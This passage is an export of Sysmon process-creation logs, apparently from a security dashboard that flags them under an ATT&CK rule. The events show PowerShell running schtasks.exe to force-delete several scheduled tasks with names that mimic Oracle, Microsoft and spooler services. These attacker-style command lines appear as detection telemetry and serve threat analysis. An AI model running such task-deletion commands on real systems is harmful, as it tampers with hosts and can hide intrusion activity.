/F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.265",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.955 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001084cd2e00} +ProcessId: 1664 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for products"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.961710400Z"",""eventRecordID"":""3543"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.955\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001084cd2e00}\r\nProcessId: 1664\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for products\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.955"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001084cd2e00}"",""processId"":""1664"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for products\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.250",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.917 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010f4cb2e00} +ProcessId: 5660 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Products Reporter"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.919935100Z"",""eventRecordID"":""3542"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.917\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010f4cb2e00}\r\nProcessId: 5660\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Products Reporter\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.917"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-0010f4cb2e00}"",""processId"":""5660"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Products Reporter\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.239",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.852 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001054ca2e00} +ProcessId: 5592 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Spooler SubSystem Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.857282500Z"",""eventRecordID"":""3541"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.852\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001054ca2e00}\r\nProcessId: 5592\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Spooler SubSystem Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.852"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001054ca2e00}"",""processId"":""5592"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Spooler SubSystem Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.207",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.795 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001072c82e00} +ProcessId: 3880 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Microsoft Telemetry"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.823449600Z"",""eventRecordID"":""3540"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.795\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001072c82e00}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Microsoft Telemetry\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.795"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001072c82e00}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Microsoft Telemetry\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.530",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.641 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010d6c42e00} +ProcessId: 4208 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.659462400Z"",""eventRecordID"":""3539"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.641\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-0010d6c42e00}\r\nProcessId: 4208\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.641"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-0010d6c42e00}"",""processId"":""4208"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:34.507",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:06.570 +ProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001002c32e00} +ProcessId: 6292 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:06.575016800Z"",""eventRecordID"":""3538"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:06.570\r\nProcessGuid: {df9fc3d3-b3f6-5ecf-0000-001002c32e00}\r\nProcessId: 6292\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:06.570"",""processGuid"":""{df9fc3d3-b3f6-5ecf-0000-001002c32e00}"",""processId"":""6292"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 